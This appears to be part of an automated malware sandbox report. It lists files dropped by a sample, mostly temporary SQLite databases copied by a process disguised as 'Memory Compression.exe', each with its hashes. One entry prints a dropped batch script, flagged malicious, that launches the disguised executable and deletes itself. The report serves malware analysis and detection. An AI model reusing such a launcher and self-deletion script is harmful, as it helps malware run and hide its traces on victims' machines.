                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\grqPBzywzR.bat

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):187
                                                                                                                                Entropy (8bit):5.192955826689312
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mbZj4I5SMLBV1EbN0dAHovBktKcKZG1Ukh4E2J5xAP:hCRLuVFOOr+DER5SMLF0N0BvKOZG192k
                                                                                                                                MD5:D63949ED73B2E8D0D19933BD1F5FD061
                                                                                                                                SHA1:FD634B6E68F6B697D85664D440A993E982F28FDE
                                                                                                                                SHA-256:A7A571AFABD9302E1157DFA37B80E76E3E740CC9DB61937FB1AA7411D85E5703
                                                                                                                                SHA-512:3E652172D67B1F592AD83628CB4419421967432EF05C22C3C4891CABB622B9394A7437562C1A592AE8F1F21757E7AA0886DE673C59E1A7F6FC45A731215CFB5B
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\windows mail\Memory Compression.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\grqPBzywzR.bat"

                                                                                                                                C:\Users\user\AppData\Local\Temp\gzlrr8PpyU

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\h1W9W3C8dG

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\h76bHj1DwF

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\h7R6dWKaJC

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\hg8yAXmVYu

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\hunFLgyuli

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25
                                                                                                                                Entropy (8bit):4.403856189774723
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:DAgt+X9P8:DFkN8
                                                                                                                                MD5:2BA5158E669CDA2A351C8FF0D54D6C75
                                                                                                                                SHA1:B4AE7649A25AB59F7FF6B77938F525543B473863
                                                                                                                                SHA-256:90DB39360B0A1F84D726DBB6C6A3C79D70EFB4A8CE8E69F6F3F0797588A6AA21
                                                                                                                                SHA-512:08DD8ADCC2A854C25885817336E9722568B37BF581B4BEE5AA53AEB931F2DC5909326F8FDED636C784F1D065A954D1D406AEEC0B2C4BD6E2C6D57166E27E55DF
                                                                                                                                Malicious:false
                                                                                                                                Preview:xtU8n3teEWaXiJT2GnAFs0YGz

                                                                                                                                C:\Users\user\AppData\Local\Temp\hyqxrrki6b

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25
                                                                                                                                Entropy (8bit):4.213660689688185
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:OdLV:OdLV
                                                                                                                                MD5:CC8B48541CCA789A9352AAB7E4EA2785
                                                                                                                                SHA1:A7661EC6CFF324E764E672E557FBDFF394776BEF
                                                                                                                                SHA-256:3C95A0FB21CD059B8A9901D0C8FCA4DBC94D262E32E34B0BC9EBFF074AA19F4F
                                                                                                                                SHA-512:76C3A2ADB335E4AD40FC56142D6CAFB78B93DE2970194BD4C48B9B050037E8FDA770EA6067F6B5C645041961F1D5B83295A102CEB2557B5194478A2625A8CC1E
                                                                                                                                Malicious:false
                                                                                                                                Preview:dAaexaJ6axjDsUnYVz5SsHc6u

                                                                                                                                C:\Users\user\AppData\Local\Temp\i87FmzMwv9

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\i8scNKSdKS

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\iL8iX8JrCt

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\iMdtkm29Sp

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\iwqb6OoQvQ

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\j5QENk5kof

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\j8ZXsnj2si

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\jZ0w6fjeKO

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\janBlKyTOR

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\jmc1T4eUpR

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\kQeFXUoZdO

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\kYrI3IneIb

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\ke3vn8xb0V

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\l0of14x7tr

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\l1JVSy37zy

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
